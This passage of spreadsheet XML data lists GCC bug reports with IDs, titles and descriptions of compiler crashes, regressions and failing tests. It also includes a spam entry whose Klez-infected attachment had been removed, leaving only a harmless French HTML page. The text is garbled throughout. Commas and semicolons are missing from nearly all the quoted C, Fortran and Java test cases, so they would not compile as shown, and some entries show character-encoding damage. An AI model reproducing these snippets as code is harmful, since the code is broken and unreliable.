FAIL: gfortran.dg/streamio_8.f90  -O0  execution test
FAIL: gfortran.dg/streamio_8.f90  -O1  execution test
FAIL: gfortran.dg/streamio_8.f90  -O2  execution test
FAIL: gfortran.dg/streamio_8.f90  -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/streamio_8.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/streamio_8.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/streamio_8.f90  -O3 -g  execution test
FAIL: gfortran.dg/streamio_8.f90  -Os  execution test
FAIL: gfortran.fortran-torture/execute/inquire_3.f90 execution  -O0
FAIL: gfortran.fortran-torture/execute/inquire_3.f90 execution  -O1
FAIL: gfortran.fortran-torture/execute/inquire_3.f90 execution  -O2
FAIL: gfortran.fortran-torture/execute/inquire_3.f90 execution  -O2 -fbounds-check
FAIL: gfortran.fortran-torture/execute/inquire_3.f90 execution  -O2 -fomit-frame-pointer -finline-functions
FAIL: gfortran.fortran-torture/execute/inquire_3.f90 execution  -O2 -fomit-frame-pointer -finline-functions -funroll-loops
FAIL: gfortran.fortran-torture/execute/inquire_3.f90 execution  -O3 -g
FAIL: gfortran.fortran-torture/execute/inquire_3.f90 execution  -Os
FAIL: gfortran.fortran-torture/execute/inquire_3.f90 execution -O2 -ftree-vectorize -msse2
FAIL: gfortran.fortran-torture/execute/inquire_4.f90 execution  -O0
FAIL: gfortran.fortran-torture/execute/inquire_4.f90 execution  -O1
FAIL: gfortran.fortran-torture/execute/inquire_4.f90 execution  -O2
FAIL: gfortran.fortran-torture/execute/inquire_4.f90 execution  -O2 -fbounds-check
FAIL: gfortran.fortran-torture/execute/inquire_4.f90 execution  -O2 -fomit-frame-pointer -finline-functions
FAIL: gfortran.fortran-torture/execute/inquire_4.f90 execution  -O2 -fomit-frame-pointer -finline-functions -funroll-loops
FAIL: gfortran.fortran-torture/execute/inquire_4.f90 execution  -O3 -g
FAIL: gfortran.fortran-torture/execute/inquire_4.f90 execution  -Os
FAIL: gfortran.fortran-torture/execute/inquire_4.f90 execution -O2 -ftree-vectorize -msse2
Revision 162619 is OK.</t>
  </si>
  <si>
    <t>GCC-70116</t>
  </si>
  <si>
    <t>tail-merge merges ubsan internal fns with different location information</t>
  </si>
  <si>
    <t>https://gcc.gnu.org/ml/gcc-patches/2015-07/msg00758.html :
...
I'd actually think it would be better to give up on the
UBSAN_* internal calls in tail merging.  Those internal pass
arguments based on their gimple_location so tail merging breaks
them.
...</t>
  </si>
  <si>
    <t>GCC-8734</t>
  </si>
  <si>
    <t>[x86_64] -O2 breaks something in 3.2.1</t>
  </si>
  <si>
    <t>When building python-numeric on x86-64 (http://www.pfdubois.com/numpy/) I get Internal compiler error attached test.c is much reduced code where error appears. with -01 it works with -O2 I get:
test.c: In function `radf3':
test.c:39: unrecognizable insn:
(insn 968 912 26 (set (reg:SI 414)
        (ashift:SI (reg/v:SI 58)
            (const_int 1 [0x1]))) -1 (nil)
    (nil))
test.c:39: Internal compiler error in extract_insn at recog.c:2158
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The test.s file (test.i is for nothing as it is almost the same as test.c):
        .file   test.c
        .section        .rodata
        .align 8
        .type   taur.0@object
        .size   taur.08
taur.0:
        .long   0
        .long   3219128320
        .align 8
        .type   taui.1@object
        .size   taui.18
taui.1:
        .long   3898100910
        .long   1072412282
Release:
gcc version 3.2.1 20021021 (prerelease) (SuSE Linux)
How-To-Repeat:
try to compile attached test.c with -O2:
gcc -O2 -c test.c -o test.o</t>
  </si>
  <si>
    <t>mcihar</t>
  </si>
  <si>
    <t>GCC-55161</t>
  </si>
  <si>
    <t>internal compiler error: in schedule_reg_moves at modulo-sched.c:731</t>
  </si>
  <si>
    <t>int test_04 (int* x int c)
{
  int s = 0
  for (int i = 0 i &lt; c ++i)
    s += *--x
  return s
}
compiled with:
./cc1 -O2 t.c --std=c99 -mthumb -march=armv7 -fmodulo-sched
worked in r192505.
In r193060 we get:
t.c:7:1: internal compiler error: in schedule_reg_moves at modulo-sched.c:731</t>
  </si>
  <si>
    <t>GCC-3977</t>
  </si>
  <si>
    <t>arm peephole for loading two consecutive memory locations generates suboptimal code (on arm7tdmi)</t>
  </si>
  <si>
    <t>I often see generated code like
add   temp pointer #offset
ldmia temp {regA regB}
(after which temp is dead)
which is slower than just
ldr regA [pointer #offset]
ldr regB [pointer #offset+4]
and wastes a register as well
Release:
3.0
How-To-Repeat:
a lot of code will do this</t>
  </si>
  <si>
    <t>GCC-56745</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] ICE in merge_if_block</t>
  </si>
  <si>
    <t>unsigned char a[6]
void
foo ()
{
  int i
  for (i = 5 i &gt;= 0 i++)
    {
      if (++a[i] != 0)
	break
      ++a[i]
    }
}
ICEs on arm-linux-gnueabi at -O2 with:
rh927931.i: In function â€˜fooâ€™:
rh927931.i:13:1: internal compiler error: in merge_if_block at ifcvt.c:3188
 }
 ^
0xcd8a6c merge_if_block
	../../gcc/ifcvt.c:3187
0xcd8a6c cond_exec_process_if_block
	../../gcc/ifcvt.c:706
0xcdc23e cond_exec_find_if_block
	../../gcc/ifcvt.c:3578
0xcdc23e find_if_header
	../../gcc/ifcvt.c:3261
0xcdc23e if_convert
	../../gcc/ifcvt.c:4381
0xcdc438 rest_of_handle_if_after_reload
	../../gcc/ifcvt.c:4527
 4.7 didn't ICE.</t>
  </si>
  <si>
    <t>GCC-12510</t>
  </si>
  <si>
    <t>[3.3 regression] ICE in final_scan_insn</t>
  </si>
  <si>
    <t>Compilation of the attached file fails with gcc 3.3.2. 2.95 works fine.
gcc -v yields the following output (it's the packaged version from Debian
GNU/Linux):
Reading specs from /usr/lib/gcc-lib/i486-linux/3.3.2/specs
Configured with: ../src/configure -v
--enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-__cxa_atexit
--enable-clocale=gnu --enable-debug --enable-java-gc=boehm
--enable-java-awt=xlib --enable-objc-gc i486-linux
Thread model: posix
gcc version 3.3.2 20030908 (Debian prerelease)
The error message reads:
lars@hydra:~/praat/fon$ gcc -DUNIX -I /usr/X11R6/include -Wimplicit
-Wreturn-type -Wunused -Wuninitialized -O -I ../sys -I ../dwsys -I ../dwtools -I
../LPC -I ../fon   -c -o ManipulationEditor.o ManipulationEditor.c
ManipulationEditor.c: In function `cb_addPitchPointAtSlice':
ManipulationEditor.c:298: internal compiler error: in final_scan_insn at
final.c:2799
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>lskovlun</t>
  </si>
  <si>
    <t>GCC-13534</t>
  </si>
  <si>
    <t>Invalid offset generated for loading 64-bit GPR on PPC64</t>
  </si>
  <si>
    <t>With this compiler:
[dhcp10:~/programs/gambc40b4] lucier% gcc -v
Reading specs from /pkgs/gcc-3.4/lib/gcc/powerpc-apple-darwin7.2.0/3.4.0/specs
Configured with: ../configure --prefix=/pkgs/gcc-3.4 --disable-checking
Thread model: posix
gcc version 3.4.0 20031229 (experimental)
the following code gives the following result:
[dhcp10:~/programs/gambc40b4] lucier% gcc -v
Reading specs from /pkgs/gcc-3.4/lib/gcc/powerpc-apple-darwin7.2.0/3.4.0/specs
Configured with: ../configure --prefix=/pkgs/gcc-3.4 --disable-checking
Thread model: posix
gcc version 3.4.0 20031229 (experimental)
Brad
struct sigcontext {
    int sc_onstack
    int sc_mask
 int sc_ir
    int sc_psw
    int sc_sp
 void *sc_regs
}
typedef int jmp_buf[(26 + 36 + 129 + 1)]
static int ___lp
/*
struct _jmp_buf {
 struct sigcontext sigcontext
 unsigned long vmask __attribute__((aligned(8)))
 unsigned long vreg[32 * 4] __attribute__((aligned(16)))
}
*/
typedef struct ___jmpbuf_struct
  {
    jmp_buf buf
  } ___jmpbuf_struct
typedef struct ___processor_state_struct
  {
    int *stack_trip
    int *stack_limit
    int *fp
    int *stack_start
    int *stack_break
    int *heap_limit
    int *hp
    int current_thread
    int run_queue
    int r[5]
    int pc
    int temp1
    int temp2
    int temp3
    int temp4
    int na
    int intr_enabled
    int intr_flag[8]
    int glo_list_head
    int glo_list_tail
    int handler_break
    int handler_stack_limit
    int handler_heap_limit
    int handler_not_proc
    int handler_not_proc_glo
    int handler_wrong_nargs
    int handler_get_rest
    int handler_get_key
    int handler_get_key_rest
    int handler_force
    int handler_cfun_conv_error
    int handler_sfun_conv_error
    int handler_return_to_c
    int executable_wills
    int nonexecutable_wills
    void (*dummy8) (void)
    void (*dummy7) (void)
    void (*dummy6) (void)
    void (*dummy5) (void)
    void (*dummy4) (void)
    void (*dummy3) (void)
    void (*dummy2) (void)
    void (*dummy1) (void)
    ___jmpbuf_struct *catcher
  } ___processor_state_struct *___processor_state
typedef int (*___host) (___processor_state)
typedef struct ___label_struct
  {
    int header
    int entry_or_descr
    void* host_label
    ___host host
  } ___label_struct
    int (*___isfinite)
       (double x)
static int ___H__23__23_rational_3f_ (___processor_state ___ps){ register int
___pc ___start ___temp register unsigned long long ___temp64 register int
___r0 register int ___r1 double ___F64V1
static void *___hlbl_tbl[]={
0
&amp;&amp;___L0__23__23_rational_3f_
0} if (___ps == 0) return (int)___hlbl_tbl
___r0=___ps-&gt;r[0] ___r1=___ps-&gt;r[1] ___start=___lp+((132)*4*4)
___pc=___ps-&gt;pc goto *((___label_struct*)(___pc-1))-&gt;host_label
___L0__23__23_rational_3f_:
   if(___ps-&gt;na==1){}else
   {___ps-&gt;temp1=___start+((132 -132 +0)*4*4) {
{___pc=___ps-&gt;handler_wrong_nargsgoto ___jumpext}}}
___L__23__23_rational_3f_:
   if (((___r1&amp;((1&lt;&lt;2)-1))==(0))) {
   goto ___L2__23__23_rational_3f_
   }
   if
((((___temp=(___r1))&amp;((1&lt;&lt;2)-1))==1&amp;&amp;((((*((int*)((___temp)-(1)))))&amp;(((1&lt;&lt;5)-1)&lt;&lt;3))==(((30))&lt;&lt;3))))
{
   goto ___L3__23__23_rational_3f_
   }
   if (!((___r1&amp;((1&lt;&lt;2)-1))==(1))) {
   goto ___L1__23__23_rational_3f_
   }
   ___r1=((((*((int*)((___r1)-(1))))
   if ((___r1==(((int)(31L))&lt;&lt;2))) {
   goto ___L2__23__23_rational_3f_
   }
   if ((___r1==(((int)(2L))&lt;&lt;2))) {
   goto ___L2__23__23_rational_3f_
   }
   if (!(___r1==(((int)(3L))&lt;&lt;2))) {
   goto ___L1__23__23_rational_3f_
   }
___L1__23__23_rational_3f_:
   ___r1=(((((int)(-1))&lt;&lt;2)+2))
   { {void *___host_label ___pc=___r0
___host_label=((___label_struct*)(___pc-1))-&gt;host_label if
(((___label_struct*)(___pc-1))-&gt;host == ___H__23__23_rational_3f_) goto
*___host_label goto ___jumpext}}
___L2__23__23_rational_3f_:
   ___r1=(((((int)(-2))&lt;&lt;2)+2))
   { {void *___host_label ___pc=___r0
___host_label=((___label_struct*)(___pc-1))-&gt;host_label if
(((___label_struct*)(___pc-1))-&gt;host == ___H__23__23_rational_3f_) goto
*___host_label goto ___jumpext}}
___L3__23__23_rational_3f_:
   ___F64V1=(*((double*)((((int*)((___r1)-(1)))+1))))
   ___r1=((___isfinite(___F64V1))?((((int)(-2))&lt;&lt;2)+2):((((int)(-1))&lt;&lt;2)+2))
   { {void *___host_label ___pc=___r0
___host_label=((___label_struct*)(___pc-1))-&gt;host_label if
(((___label_struct*)(___pc-1))-&gt;host == ___H__23__23_rational_3f_) goto
*___host_label goto ___jumpext}}
___jumpext:
___ps-&gt;pc=___pc ___ps-&gt;r[1]=___r1 return ___pc }</t>
  </si>
  <si>
    <t>GCC-6416</t>
  </si>
  <si>
    <t>Suivante</t>
  </si>
  <si>
    <t xml:space="preserve"> --Vw700U2tVW656096skP154IC5C1v5Z
 Content-Type: text/plain charset=us-ascii
 Content-Transfer-Encoding: 7bit
 ------------------  Virus Warning Message (on mtvirus)
 Found virus WORM_KLEZ.G in file IBM.scr
 The uncleanable file is deleted.
 ---------------------------------------------------------
 --Vw700U2tVW656096skP154IC5C1v5Z
 Content-Type: text/html
 Content-Transfer-Encoding: quoted-printable
 --Vw700U2tVW656096skP154IC5C1v5Z
 Content-Type: text/plain charset=us-ascii
 Content-Transfer-Encoding: 7bit
 ------------------  Virus Warning Message (on mtvirus)
 IBM.scr is removed from here because it contains a virus.
 ---------------------------------------------------------
 --Vw700U2tVW656096skP154IC5C1v5Z
 --Vw700U2tVW656096skP154IC5C1v5Z
 Content-Type: application/octet-stream
 	name=ARMAIN.HTM
 Content-Transfer-Encoding: base64
 Content-ID: 
 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTC8vRU4iPg0KPGh0bWw+
 DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSINCmNvbnRlbnQ9InRl
 eHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4NCjxUSVRMRT5PcmdhbmlzYXRpb24gZGUg
 dm90cmUgZXNwYWNlIGRlIHRyYXZhaWw8L1RJVExFPg0KPC9IRUFEPjxCT0RZPjxicj4NCjxI
 Mj5PcmdhbmlzYXRpb24gZGUgdm90cmUgZXNwYWNlIGRlIHRyYXZhaWw8L0gyPg0KPGhyPg0K
 PHA+TG9yc3F1ZSB2b3VzIGRpc3Bvc2V6IHZvdHJlIG9yZGluYXRldXIsIGFt6W5hZ2V6LXZv
 dXMgdW4gZXNwYWNlDQpzdWZmaXNhbnQgcG91ciB0cmF2YWlsbGVyIGRhbnMgZGVzIGNvbmRp
 dGlvbnMgY29uZm9ydGFibGVzLiBQbGFjZXoNCmwnb3JkaW5hdGV1ciBldCBsZSBjbGF2aWVy
 IGp1c3RlIGVuIGZhY2UgZGUgdm91cywgZXQgbGEgc291cmlzIOAgY/R06Q0KZHUgY2xhdmll
 ci4NClMnaWwgcydhZ2l0IGQndW4gbW9k6GxlIGF2ZWMgdG91ciwgY2VsbGUtY2kgcGV1dCDq
 dHJlIHBsYWPpZSBzb3VzDQp2b3RyZSBidXJlYXUgb3Ug4CBj9HTpIGRlIGNlbHVpLWNpLg0K
 TidvdWJsaWV6IHBhcyBkZSBwcul2b2lyIGRlIGwnZXNwYWNlIHBvdXIgZCdhdXRyZXMgb2Jq
 ZXRzIHF1aSBwZXV2ZW50DQp2b3VzIOp0cmUgbuljZXNzYWlyZXMgOiBtYW51ZWxzIGRlIHLp
 ZulyZW5jZSwgcG9ydGUtY29waWVzLA0KYmxvY3Mtbm90ZXMgZXQgc3VwcG9ydHMgcG91ciBk
 aXNxdWV0dGVzIG91IENELCBwYXIgZXhlbXBsZS4NCjxQPjwvUD4NCjxJTUcgU1JDPSJBcnIw
 MDAwMC5naWYiIEFMVD0iQXJyMDAwMDAuZ2lmIiBCT1JERVI9MCBXSURUSD0yMzYgSEVJR0hU
 PTIxMz4NCjxQPjwvUD4NClBvdXIgcGx1cyBkJ2luZm9ybWF0aW9ucyBjb25jZXJuYW50IGxl
 IHRyYXZhaWwgc3VyIG9yZGluYXRldXIgZXQNCmwnZXJnb25vbWllIGVuIGVudmlyb25uZW1l
 bnQgaW5mb3JtYXRpcXVlLCBjb25zdWx0ZXogbGEgcGFnZSBXZWIgSUJNDQpIZWFsdGh5IENv
 bXB1dGluZyDgIGwnYWRyZXNzZSBzdWl2YW50ZSA6DQpodHRwOi8vd3d3LnBjLmlibS5jb20v
 dXMvaGVhbHRoeWNvbXB1dGluZw0KPGJyPg0KPC9CT0RZPg0KPC9IVE1MPg0K
 --Vw700U2tVW656096skP154IC5C1v5Z--
Release:
unknown</t>
  </si>
  <si>
    <t>revebebe</t>
  </si>
  <si>
    <t>GCC-13183</t>
  </si>
  <si>
    <t>[3.4 Regression] [unit-at-a-time] incorrect multidimensional array initializer with -O2</t>
  </si>
  <si>
    <t>The test case:
class procinfo { }
class autogen {
  static String procs[][] = {{Catchtable CatchEntry}}
  public static void main(String argv[]) { }
}
fails to execute if compiled with -O2:
$ ./autogen
Exception in thread main java.lang.ExceptionInInitializerError
   at java.lang.Class.initializeClass() (/opt/gcc/lib/libgcj.so.4.0.0)
   at _Jv_InitClass (/opt/gcc/lib/libgcj.so.4.0.0)
   at autogen.main(java.lang.String[]) (Unknown Source)
Caused by: java.lang.NullPointerException
   at _Jv_NewObjectArray (/opt/gcc/lib/libgcj.so.4.0.0)
   at autogen.__U3c_clinit__U3e_() (Unknown Source)
   at java.lang.Class.initializeClass() (/opt/gcc/lib/libgcj.so.4.0.0)
   ...2 more</t>
  </si>
  <si>
    <t>GCC-77349</t>
  </si>
  <si>
    <t>AIX DWARF debugging offset in 64 bit mode</t>
  </si>
  <si>
    <t>The AIX assembler implicitly inserts the length information at the beginning of DWARF debugging sections.  In 64 bit mode it also implicitly inserts the 64 bit DWARF extension escape sequence. This requires that GCC emit 64 bit offsets to match the directive emitted by the assembler.</t>
  </si>
  <si>
    <t>GCC-3630</t>
  </si>
  <si>
    <t>GCC 3.0 fails to bootstrap on Solaris 8 (Intel)</t>
  </si>
  <si>
    <t>GCC 3.0 fails to bootstrap from gcc 2.95.2 and 2.95.3 on a
Solaris 8 (Intel) system that successfully builds prior
versions of gcc.  Below are the errors I get
../xgcc -B./ -B/usr/local/i386-pc-solaris2.8/bin/ -isystem
/usr/local/i386-pc-solaris2.8/include -O2   -DIN_GCC   
-W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes
-isystem ./include  -fPIC -g1 
-DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -I. -I.
-I../../gcc-3.0/gcc 
-I../../gcc-3.0/gcc/.  -I../../gcc-3.0/gcc/config
-I../../gcc-3.0/gcc/../include -fexceptions -c 
../../gcc-3.0/gcc/unwind-dw2.c -o libgcc/./unwind-dw2.o
../../gcc-3.0/gcc/unwind-dw2.c: In function `extract_cie_info':
../../gcc-3.0/gcc/unwind-dw2.c:219: warning: implicit declaration of
function `strlen'
../../gcc-3.0/gcc/unwind-dw2.c: In function `execute_stack_op':
../../gcc-3.0/gcc/unwind-dw2.c:300: warning: `result' might be used
uninitialized in this function
../../gcc-3.0/gcc/unwind-dw2.c: In function `execute_cfa_program':
../../gcc-3.0/gcc/unwind-dw2.c:775: warning: implicit declaration of
function `alloca'
../../gcc-3.0/gcc/unwind-dw2.c: In function `uw_frame_state_for':
../../gcc-3.0/gcc/unwind-dw2.c:886: warning: implicit declaration of
function `memset'
../../gcc-3.0/gcc/unwind-dw2.c: In function `uw_install_context_1':
../../gcc-3.0/gcc/unwind-dw2.c:1088: warning: missing braces around
initializer
../../gcc-3.0/gcc/unwind-dw2.c:1088: warning: (near initialization for
`once_regsizes.__pthread_once_pad')
../../gcc-3.0/gcc/unwind-dw2.c:1103: warning: implicit declaration of
function `memcpy'
Assembler: unwind-dw2.c
        /var/tmp/ccpK09aa.s line 4264 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4287 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4318 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4345 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4382 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4425 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4468 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4507 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4542 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4571 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4606 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4637 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4680 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4723 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4760 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4795 : Illegal subtraction
        /var/tmp/ccpK09aa.s line 4834 : Illegal subtraction
*** Error code 1
make: Fatal error: Command failed for target `libgcc/unwind-dw2.o'
Current working directory /export/home/local/src/gcc-3.0_build/gcc
*** Error code 1
make: Fatal error: Command failed for target `libgcc.a'
Current working directory /export/home/local/src/gcc-3.0_build/gcc
*** Error code 1
make: Fatal error: Command failed for target `stage1_build'
Current working directory /export/home/local/src/gcc-3.0_build/gcc
*** Error code 1
make: Fatal error: Command failed for target `bootstrap'
Release:
3.0
Environment:
Solaris 8 (Intel edition) MU 4 Developer's installation
How-To-Repeat:
Perform a routine bootstrap on the specified platform.</t>
  </si>
  <si>
    <t>bernieh1</t>
  </si>
  <si>
    <t>GCC-44575</t>
  </si>
  <si>
    <t>[4.5 Regression] __builtin_va_arg overwrites into adjacent stack location</t>
  </si>
  <si>
    <t>$ cat vararg.c
#include 
#include 
#include 
int fails = 0
struct S116 { float a[3] } 
struct S116 a116[5]
void check116va (int z ...)
{ struct S116 arg *p
  va_list ap
  int j=0k=0
  int i
  __builtin_va_start(apz)
  for (i = 2 i &lt; 4 ++i) {
    p = NULL
    j++
    k+=2
    switch ((z &lt;&lt; 4) | i) {
      case 0x12: case 0x13: p =  arg = __builtin_va_arg(apstruct S116) break
      default: ++fails break
    }
    if (p &amp;&amp; p-&gt;a[2] != arg.a[2]) {
      ++fails
    }
    if (fails)
      break
  }
  __builtin_va_end(ap)
}
int main()
{
  memset (a116 '\0' sizeof (a116))
  a116[2].a[2] = -49026.625000
  check116va (1 a116[2] a116[2])
  if (fails)
    abort()
}
$ ./trunk-gcc -O0  vararg.c &amp;&amp; ./a.out
Aborted
./trunk-gcc is gcc 4.6.0  configured with --target=x86_64-unknown-linux-gnu --disable-nls --enable-threads=posix --enable-symvers=gnu --enable-__cxa_atexit --enable-c99 --enable-long-long --with-gnu-as --with-gnu-ld --build=x86_64-unknown-linux-gnu --host=x86_64-unknown-linux-gnu --enable-checking=release --enable-multilib --enable-targets=all --with-arch-32=pentium3 --with-tune-32=pentium4  --enable-shared=libgcclibmudflaplibssplibstdc++libgfortran --with-pic=libgfortran --enable-languages=cc++fortran  --with-native-system-header-dir=/include  --enable-linker-build-id  --with-host-libstdcxx=-lstdc++ FCFLAGS='-g -O2 ' 
The test cases passes with gcc 4.2.4 and 4.4.3.  
The gimple for __builtin_va_arg (from vararg.c.004t.gimple ) contains
  addr.1 = 
  addr.5 = (long unsigned int * {ref-all}) addr.1
  sse_addr.6 = (long unsigned int *) sse_addr.3
  D.3520 = *sse_addr.6
  *addr.5 = D.3520          ---&gt; (1)      
  addr.7 = (long unsigned int * {ref-all}) addr.1
  D.3522 = addr.7 + 8
  sse_addr.8 = (long unsigned int *) sse_addr.3
  D.3524 = sse_addr.8 + 16
  D.3525 = *D.3524
  *D.3522 = D.3525         ---&gt; (2)
The assignments  (1) and (2) above are 8 byte moves one at offset 0 and another at offset 8 into va_arg_tmp.4. But the size of va_arg_tmp.4 is 12 bytes (sizeof (struct S116)) resulting in overwriting of adjacent stack location ( variable i in this case) leading to the failure.</t>
  </si>
  <si>
    <t>GCC-10977</t>
  </si>
  <si>
    <t>issues with bug 8567</t>
  </si>
  <si>
    <t>Bug 8567 is marked as CLOSED and FIXED.  A few weeks ago I posted (as
brondsem@yahoo.com) 2 test cases which show it to be unresolved but I recieved
no response.  I cannot determine a way to re-open the bug so I must resort to
filing a new bug.</t>
  </si>
  <si>
    <t>sign_up</t>
  </si>
  <si>
    <t>GCC-46933</t>
  </si>
  <si>
    <t>[4.6 Regression] Revision 167781 failed g++.dg/other/first-global.C</t>
  </si>
  <si>
    <t>Revision 167781:
http://gcc.gnu.org/ml/gcc-cvs/2010-12/msg00463.html
caused:
FAIL: g++.dg/other/first-global.C scan-assembler _GLOBAL__I(_|_65535_0_)foobar</t>
  </si>
  <si>
    <t>GCC-42502</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] Poor register allocation in very simple code</t>
  </si>
  <si>
    <t>The following code
// compilation options: -march=armv5te -mthumb -Os
struct node
{
 long long a
 long long b
}
void func (struct node *n)
long long test (int from int to)
{
 struct node n
 func(
 if (from == 1)
   return n.a
 else
   {
     if (to == 2)
       return n.b
     else
       return n.b - n.a
   }
}
is compiled by gcc 4.2.1 to 44 bytes and gcc 4.4.0 to 60 bytes. Assembly files shows 6 unneeded movs in the else clause and duplication of sp in r4:
gcc 4.2.1 output:
test:
       push    {r4 r5 lr}
       sub     sp sp #20
       mov     r4 r0
       mov     r0 sp
       mov     r5 r1
       bl      func
       cmp     r4 #1
       bne     .L2
       ldr     r0 [sp]
       ldr     r1 [sp #4]
       b       .L4
.L2:
       ldr     r0 [sp #8]
       ldr     r1 [sp #12]
       cmp     r5 #2
       beq     .L4
       ldr     r3 [sp]
       ldr     r4 [sp #4]
       sub     r0 r0 r3
       sbc     r1 r1 r4
.L4:
       add     sp sp #20
       @ sp needed for prologue
       pop     {r4 r5 pc}
gcc 4.4 output:
test:
       push    {r4 r5 r6 lr}
       sub     sp sp #16
       mov     r5 r0
       mov     r0 sp
       mov     r6 r1
       mov     r4 sp    // why duplicate sp in r4? sp is never modified in the function
       bl      func
       cmp     r5 #1
       bne     .L2
       ldr     r3 [sp]
       ldr     r4 [sp #4]
       b       .L3
.L2:
       ldr     r2 [r4 #8]
       ldr     r3 [r4 #12]
       cmp     r6 #2
       bne     .L4
       mov     r4 r3  // the magic dance of the registers
       mov     r3 r2
       b       .L3
.L4:
       ldr     r0 [r4]
       ldr     r1 [r4 #4]
       mov     r4 r3  // another magic dance
       mov     r3 r2
       sub     r3 r3 r0
       sbc     r4 r4 r1
.L3:
       add     sp sp #16
       mov     r0 r3   // again unneeded movs.
       mov     r1 r4   // result can be calculated in r0r1 directly (see gcc 4.2.1 version)
       @ sp needed for prologue
       pop     {r4 r5 r6 pc}
The code was extracted from GCC SPEC benchmark.</t>
  </si>
  <si>
    <t>GCC-76490</t>
  </si>
  <si>
    <t>[5 Regression] when use -O2 -fcheck-founds compiler appears to hang and consumes all memory</t>
  </si>
  <si>
    <t>Routine that has compiled for years with gfortran 4.9.6 and older versions now hangs compiler when -O2 -fbound-checks is used. Running on Cygwin with 5.4.0 version. Reduced to simple test case. Might be duplicate of other reports of all memory being consumed but none seems to match exactly. Small test program wrapped in a bash(1) shell attached.
---------------------------</t>
  </si>
  <si>
    <t>urbanjost</t>
  </si>
  <si>
    <t>GCC-1248</t>
  </si>
  <si>
    <t>Fails to compile: implicit declaration of function `int __builtin_expect(...)</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: Gregory R. Warnes 
Cc: java-gnats@sourceware.cygnus.com tromey@cygnus.com
Subject: Re: libgcj/226: Fails to compile: implicit declaration of function
 `int __builtin_expect(...)
Date: Thu 18 May 2000 14:51:25 -0700 (PDT)
 &gt;&gt;&gt;&gt;&gt; Gregory == Gregory R Warnes  writes:
 Gregory&gt; It would probably be a good idea to add an autoconf test for
 Gregory&gt; __builtin_expect .
 I agree and that's what I'm planning to do.
 I might be able to get to it today.
 We'll see.  It depends on how my current project goes.
 Tom
</t>
  </si>
  <si>
    <t>warnes</t>
  </si>
  <si>
    <t>GCC-53952</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: libmudflap.c++/pass55-frag.cxx ( -O[123]) execution test</t>
  </si>
  <si>
    <t>I see since quite some time
FAIL: libmudflap.c++/pass55-frag.cxx ( -O) execution test
FAIL: libmudflap.c++/pass55-frag.cxx (-O2) execution test
FAIL: libmudflap.c++/pass55-frag.cxx (-O3) execution test
with -O0 it does not fail.
I suspect stricter variable lifetime handling but did not try to confirm.</t>
  </si>
  <si>
    <t>GCC-2140</t>
  </si>
  <si>
    <t>Internet error: Segmentation fault / Tree check: expected class ...</t>
  </si>
  <si>
    <t>On compilation of the attached file with GCC 3.0 Branch I get:
[lots of warnings]
Gram.y:1438: Internal error: Segmentation fault
GCC CVS HEAD gives:
[...]
Gram.y:1438: Tree check: expected class 'e' have 'd' (function_decl) in
   compare_ics at cp/call.c:4787
Release:
gcc CVS 2001-01-03 (GCC 3.0 Branch &amp; HEAD)
Environment:
GNU/Linux 2.2.13
How-To-Repeat:
compile the attached file with
c++ -DNDEBUG  -O3 -fPIC -Wall -fpermissive G.cpp</t>
  </si>
  <si>
    <t>GCC-18392</t>
  </si>
  <si>
    <t>[4.0 only] segfault on derived type namelist input</t>
  </si>
  <si>
    <t>$ cat foo.f90
program main
  implicit none
  type foo
     integer a
     real b
  end type foo
  type(foo) :: a
  namelist /nl/ a
  read (*nl)
end program main
$ gfortran -v
Reading specs from /home/zfkts/lib/gcc/ia64-unknown-linux-gnu/4.0.0/specs
Configured with: ../gcc-4.0-20041107/configure --prefix=/home/zfkts
--enable-languages=cc++f95
Thread model: posix
gcc version 4.0.0 20041107 (experimental)
$ gfortran foo.f90
$ ./a.out
 &amp;NL
 A%A = 10
Segmentation fault
According to Richard Maine (who knows the Fortran standard much
better than I do :-) on 
this input should be legal.</t>
  </si>
  <si>
    <t>GCC-45815</t>
  </si>
  <si>
    <t>[4.6 Regression] error: '-fsplit-stack' currently only supported on GNU/Linux</t>
  </si>
  <si>
    <t>On x86_64-apple-darwin10.4.0 at revision 164677 I see several errors in the test suite of the kind:
[macbook] f90/bug% gcc46 -c /opt/gcc/work/gcc/testsuite/gcc.dg/pr37106-1.c
/opt/gcc/work/gcc/testsuite/gcc.dg/pr37106-1.c:9:1: error: '-fsplit-stack' currently only supported on GNU/Linux
/opt/gcc/work/gcc/testsuite/gcc.dg/pr37106-1.c:9:1: error: '-fsplit-stack' is not supported by this compiler configuration
From where this '-fsplit-stack' is coming?</t>
  </si>
  <si>
    <t>GCC-31037</t>
  </si>
